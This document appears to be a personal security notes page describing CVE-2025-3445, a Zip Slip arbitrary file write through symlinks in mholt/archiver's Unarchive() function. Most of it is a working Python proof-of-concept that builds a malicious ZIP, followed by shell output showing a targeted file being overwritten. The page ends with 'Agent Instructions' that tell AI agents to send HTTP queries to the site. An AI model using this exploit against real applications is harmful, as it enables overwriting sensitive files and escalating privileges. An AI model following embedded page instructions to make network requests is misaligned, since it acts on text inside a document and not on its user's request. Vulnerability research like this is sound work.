# CVE-2025-3445

Affected versions (>=3.0.0 <4.0.0-alpha.1) of this package are vulnerable to <mark style="color:red;">Arbitrary File Write</mark> via Archive Extraction (<mark style="color:red;">**Zip**</mark> Slip) in the `Unarchive()` function. An attacker can overwrite sensitive files and potentially escalate privileges by supplying a malicious archive file containing symlinks, which is unarchived by the vulnerable application.

A very similar vulnerability was found in **TAR** files ([CVE-2024-0406](/notes/exploits-pocs/golang/mholt-archiver/cve-2024-0406.md)).&#x20;

Although a fix was implemented, it hasn't been officially released, and the affected project has since been deprecated. The successor to mholt/archiver is a new project called mholt/archives, and its initial release (v0.1.0) removes the Unarchive() functionality.

***

### PoC || GTFO

```bash
» python3 cve-2025-3445.py /tmp/sessions/admin/fake_session
ZIP file created at cve-2025-3445.zip with symlink pointing to /tmp/sessions/admin/fake_session

# Upload file to target which use Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:11 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:11 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
```

```python
# cve-2025-3445.py
import zipfile
import sys
import io

def create_zip(zip_path, symlink_target):
    with zipfile.ZipFile(zip_path, 'w') as zip_ref:
        symlink_info = zipfile.ZipInfo('./x')
        symlink_info.external_attr = 0o120777 << 16  # symlink type
        zip_ref.writestr(symlink_info, symlink_target)
        # Optional: write content to a normal file if needed
        regular_file_content = b'<some-file-content-here>'
        zip_ref.writestr('x', regular_file_content)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)

    symlink_target = sys.argv[1]
    zip_path = "cve-2025-3445.zip"

    create_zip(zip_path, symlink_target)
    print(f"ZIP file created at {zip_path} with symlink pointing to {symlink_target}")
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/golang/mholt-archiver/cve-2025-3445.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.